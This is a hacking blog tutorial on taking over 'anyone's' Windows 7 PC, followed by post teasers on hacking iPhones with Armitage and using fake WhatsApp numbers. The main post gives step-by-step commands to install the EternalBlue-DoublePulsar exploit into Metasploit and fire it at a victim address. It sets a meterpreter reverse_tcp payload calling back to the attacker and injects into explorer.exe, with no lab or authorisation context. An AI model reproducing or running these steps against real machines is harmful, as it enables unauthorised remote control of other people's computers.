Skip to main content
How to hack windows of anyone in LAN and WAN


Hello friends how are you all I hope you are learning and applying your hacking today I am here with another tutorial on how to hack windows of victim whether you are on WAN and LAN.

I want to tell you that if you want to hack anything like mobile or windows on WAN you need port forwarding port forwarding generally means that all the internet traffic will pass through the port you have forwarded so to do this you need Kali Linux with updated Metasploit in it.

if you don't have Linux or you don't know how to install Linux you just give me an email on(arunegiofficial@gmail.com).


Eternal blue-Double pulsar-Metasploit

Today in this post we gonna learn how to exploit windows 7 using Eternalblue-Doublepulsar Exploit with Metasploit
So What is Eternalblue-Doublepulsar?
EternalBlue Malware Developed by National Security Agency (NSA) exploiting Windows based Server Message Block (SMBv1) and to be believed the tool has released by Shadow Brokers hackers Group in April 2017 and it has been used for Wannacry Cyber Attack.
The DOUBLEPULSAR help us to provide a backdoor access to a windows system.
We can exploit Windows 7 remotely and don’t need to send any spyware or payload to the victim.
So let’s get started!
Attacker Machine: Kali Linux – [IP Address: 192.168.1.103]
(you can use any other penetration-testing OS)
Victim Machine: Windows 7 – [IP Address: 192.168.1.112]
Before Downloading any exploit from GitHub we have to configure something called wine
wine help us to run windows program on a non-Windows computer
 apt-get update -y
apt-get upgrade -y
apt-get install wine -y
apt-get install winetricks -y
dpkg –add-architecture i386 && apt-get update && apt-get install wine32 -y
Run these above command one by one. After this, we have to Download the Exploit from GitHub. Open the terminal in Kali Linux and type the following command to download this exploit from GitHub.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Note: Be sure that we’re cloning the git in the home directory.
After Downloading the exploit we need to move the exploit inside the Metasploit to do that, just go ahead and open the downloaded directory and copy Eternal Blue-Doublepulsar.rb ruby file.
Now paste these copied ruby file inside given path /usr/share/Metasploit-framework /module/exploits/windows/smb which will add this exploit inside Metasploit-Framework.
Now we are done with importing exploit to Metasploit-Framework, just load msfconsole.
 
msf  > use exploit/windows/smb/eternalblue_doublepulsar
 
msf show options
 
You can change the options according to your need.
Here, we have to set
msf exploit(eternalblue_doublepulsar) > RHOST <Victim Address>
msf exploit(eternalblue_doublepulsar) > RPORT 445
We have to set a windows meterpreter reverse_tcp payload to get a reverse connection in meterpreter.
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(eternalblue_doublepulsar) > set LHOST <Attacker Address>
We also have to specify a PROCESSINJECT
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe 
(you can give whatever process that you want to migrate to)
Set target architecture according to victim machine by default it is set to x86 (32bit)
msf exploit(eternalblue_doublepulsar) >set targetarchitecture x64
As you can see below screenshot all config is all set
Just we need to type exploit and which will give us a meterpreter session.
We successfully spawned a meterpreter shell in Windows 7.



if you want to learn hacking from starting you just give me an email(arunceo110@gmail.com)and when i will hit 200 mail i will create a whole new blog only for that.

Comments

Popular posts from this blog

How to hack someone's phone HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]

How to Hack an iPhone with Armitage on same network

Step 1 Correctly Installed Kali Linux. Kali Linux has to be correctly installed and on its newest Version. Step 2 Same Network The iPhone that you will be going to hack has to be on the same network as you. Step 3 Open Armitage To start armitage just put in "armitage" in the command prompt and hit enter. A Login Dialog will show up and without changing anything press Connect. Another Dialog will show up and you just press "YES". For Kali Live Users: Before executing the command above you have to execute two commands in the command prompt: msfdb init service postgresql start Step 4 Find Out Ip Address When everything is finished loading, press the Hosts button and Add Host. In this Text Window you put in the Ip Address of the iPhone. If you don´t know the Ip-Address you can scan the network with nmap or zmap. Step 5 Start the Exploit Note: This exploit only works on jailbroken iPhones. Go to Section exploit > apple_ios > ssh Click on cydia

USE WHATSAPP WITH FAKE NUMBERS

hello my friends today i am going to tell you how to use fake whatsapp number for chatting in foreign groups. friends if you want any type of hacking post or if you have any software related problem just email me i will post my next blog on that topic email me on(arunegiofficial@gmail.com). now friend as being a hacker  we need to joinn many whatsapp grouup to gain or get knowledge . we all know that in those groups we dont get any knowldege we just get messages  like "how to hack facebook' blah blah blah, leave it but today i am gonna tell you 3 ways to hide your identity on whatsapp and use face number Use 2 whatsapp in one android phone install gb whatsapp and registered your fake number with this app Download and install  latest gb whatsapp v6.00 How to use whatsapp  with (+63) number⇒ whatsapp with fake number -Use whatsapp with (+63) Philippines number work with the help of Talk2 PH app, if u getting system error while verifying your mobile number in t